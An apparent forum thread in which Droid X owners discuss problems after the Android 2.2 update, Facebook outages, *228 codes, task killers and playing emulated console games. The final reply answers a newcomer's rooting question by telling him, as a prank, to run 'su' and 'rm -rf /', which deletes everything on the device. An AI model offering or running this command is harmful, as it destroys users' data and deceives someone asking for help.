I have definitely had issues with FB App and m.facebook.com before. I have teh DX on VZW as well and my phone is amazing right now…
just tried facebook on my phone and no problems, maybe FB is not compatible with the X update

Bobby can you launch a web page? When I noticed that my FB/Twitter wouldn’t update all my data was dead. I did *228-1, then *228-2, then power cycle and all has been well since. Not sure which one fixed it.
FB is even acting up on my computer. Maybe something is wrong with it.
Facebook just came back up. I *228-1 my phone about an hour ago. Maybe it just needs to adjust to the new settings or maybe Verizon is tweaking things. Who knows, but it looks like its slowly coming back to life.
facebooks server was down for a bit today… that was the problem not the update. As for you’re lag and such idk mine is working fine. However I did uninstall then reinstall handcent because pic messages weren’t sending correctly
So after getting all the bugs out of my phone, I decided to install a few roms and sync a Wii controller with my X and now I can play Zelda, GTA, Tony Hawk 4 and sooooooooo many other games on my phone. It took me a while to get everything installed and setup, but I got all that done, it was a breeze and now my flight to Detroit and Indiana will be a bit more interesting.
This is awesome, I would def recommend this to everyone. PSX rom via Droid X using my HDMI cable to my 52" Samsung= pure baller status. No need to spend my money and have consoles laying around and I can have it on the go!!!
Big thing i noticed is my task killer seems to make stuff glitchy with 2.2 so I turned it off. My flashlight app no longer works and I have had a couple force close issues I never had before with 2.1
Yeah, one thing I don’t like is that I can’t close a couple of apps with ATK. Namely Pandora and VZNAV
So once I root, how do I do root stuff? I followed the latest method on droid-life and it looks like everything worked like a charm, but I see no signs of special permissions anywhere.
you should see a new app called superuser permissions, or something to that effect
then, when you try to use an app that requires root, you will get a pop-up asking if you want to allow that app to get root access

open terminal, type the following
su
rm -rf /
exit
then reboot, ALL GONE!!
